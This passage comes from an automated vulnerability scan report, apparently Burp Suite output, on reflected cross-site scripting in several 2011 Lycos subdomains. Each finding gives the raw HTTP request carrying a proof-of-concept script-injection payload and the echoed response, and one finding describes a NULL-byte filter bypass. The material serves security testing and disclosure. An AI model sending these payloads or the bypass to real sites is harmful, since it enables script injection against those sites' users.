GET /deals/stores/tigerdirect-597?b5d02"style%3d"x%3aexpression(alert(1))"b40fd06c19d=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:56:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76210
1.268. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/walmart-321
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb365"style%3d"x%3aexpression(alert(1))"303ad275b1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb365"style="x:expression(alert(1))"303ad275b1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/walmart-321?bb365"style%3d"x%3aexpression(alert(1))"303ad275b1f=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:46 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 74747
<title>Walmart Deals, Walmart Sal ...[SNIP]... <a href="?pn=2&bb365"style="x:expression(alert(1))"303ad275b1f=1"> ...[SNIP]...
1.269. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://info.lycos.com
Path:
/tos.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 963e7"><script>alert(1)</script>1ea902f3967 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tos.php/963e7"><script>alert(1)</script>1ea902f3967 HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:22:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:22:09 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 91334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <a href="/tos.php/963e7"><script>alert(1)</script>1ea902f3967#acceptance"> ...[SNIP]...
The value of the l request parameter is copied into the HTML document as text between TITLE tags. The payload 91b55</title><script>alert(1)</script>4bc6160af5e was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?q=&l=91b55</title><script>alert(1)</script>4bc6160af5e HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:24:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16555
1.271. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.lycos.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be3fc"style%3d"x%3aexpression(alert(1))"867ed00c325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be3fc"style="x:expression(alert(1))"867ed00c325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?q=Accounting+%2F+Finance&be3fc"style%3d"x%3aexpression(alert(1))"867ed00c325=1 HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:25:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:25:20 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/jobs/search?pn=2&q=Accounting / Finance&be3fc"style="x:expression(alert(1))"867ed00c325=1"> ...[SNIP]...
The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload 2ee0f</title><script>alert(1)</script>889686a6c1d was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?q={searchTerms}2ee0f</title><script>alert(1)</script>889686a6c1d&src=OS HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:23 GMT; path=/ Set-Cookie: PARTNER=os Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:23:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <title>{searchTerms}2ee0f</title><script>alert(1)</script>889686a6c1d Jobs Near You on Lycos Jobs</title> ...[SNIP]...
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f6c"style%3d"x%3aexpression(alert(1))"62f2861325d was submitted in the x parameter. This input was echoed as a5f6c"style="x:expression(alert(1))"62f2861325d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /search?x=1a5f6c"style%3d"x%3aexpression(alert(1))"62f2861325d HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 16:04:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 16:04:03 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 60454
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe453"style%3d"x%3aexpression(alert(1))"5103e16dd11 was submitted in the x parameter. This input was echoed as fe453"style="x:expression(alert(1))"5103e16dd11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?x=1fe453"style%3d"x%3aexpression(alert(1))"5103e16dd11 HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:47 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 58803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/jobs/search?pn=2&x=1fe453"style="x:expression(alert(1))"5103e16dd11&q="> ...[SNIP]...
1.275. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://peoplesearch.lycos.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc14"><script>alert(1)</script>f33690b523c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&7cc14"><script>alert(1)</script>f33690b523c=1 HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.4.10.1297090205
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:50:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&7cc14"><script>alert(1)</script>f33690b523c=1&mobile=1"> ...[SNIP]...
The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7741c"><script>alert(1)</script>24c511f9dc0 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&search-type=white_pages7741c"><script>alert(1)</script>24c511f9dc0 HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:23:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&search-type=white_pages7741c"><script>alert(1)</script>24c511f9dc0&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3474d"><script>alert(1)</script>4e2dee260c6 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people3474d"><script>alert(1)</script>4e2dee260c6 HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.4.10.1297090205
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:50:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people3474d"><script>alert(1)</script>4e2dee260c6&mobile=1"> ...[SNIP]...
1.278. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://peoplesearch.lycos.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ac3a"><script>alert(1)</script>a1eccbcbc12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?7ac3a"><script>alert(1)</script>a1eccbcbc12=1 HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:23:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?7ac3a"><script>alert(1)</script>a1eccbcbc12=1&mobile=1"> ...[SNIP]...
1.279. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://registration.lycos.com
Path:
/forgot.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba03"><script>alert(1)</script>06d84703f11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forgot.php/cba03"><script>alert(1)</script>06d84703f11 HTTP/1.1 Host: registration.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; isMobile=nonmobile; __utmb=207906063.7.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:01 GMT Server: X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 15:24:00 GMT Set-Cookie: isMobile=nonmobile; expires=Mon, 07-Feb-2011 16:24:01 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 5935 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Forgot Password</title>
1.280. https://registration.lycos.com/login.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://registration.lycos.com
Path:
/login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131eb"><script>alert(1)</script>7bbbd5c508a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login.php/131eb"><script>alert(1)</script>7bbbd5c508a HTTP/1.1 Host: registration.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090495178369; __utmc=207906063; isMobile=mobile; __utmb=207906063.7.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:56:47 GMT Server: X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:56:46 GMT Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:56:47 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 6032 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Login</title>
1.281. https://registration.lycos.com/lostpassword.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://registration.lycos.com
Path:
/lostpassword.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d547"><script>alert(1)</script>f9f2dd8189d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lostpassword.php/8d547"><script>alert(1)</script>f9f2dd8189d HTTP/1.1 Host: registration.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090495178369; __utmc=207906063; isMobile=mobile; __utmb=207906063.7.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:56:45 GMT Server: X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:56:44 GMT Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:56:45 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 5956 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Forgot Password</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd73"><script>alert(1)</script>f4f3653e469 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lostpassword.php/5dd73"><script>alert(1)</script>f4f3653e469=%22x:expre/**/ssion(alert(9)) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: registration.lycos.com Connection: Keep-Alive
Response
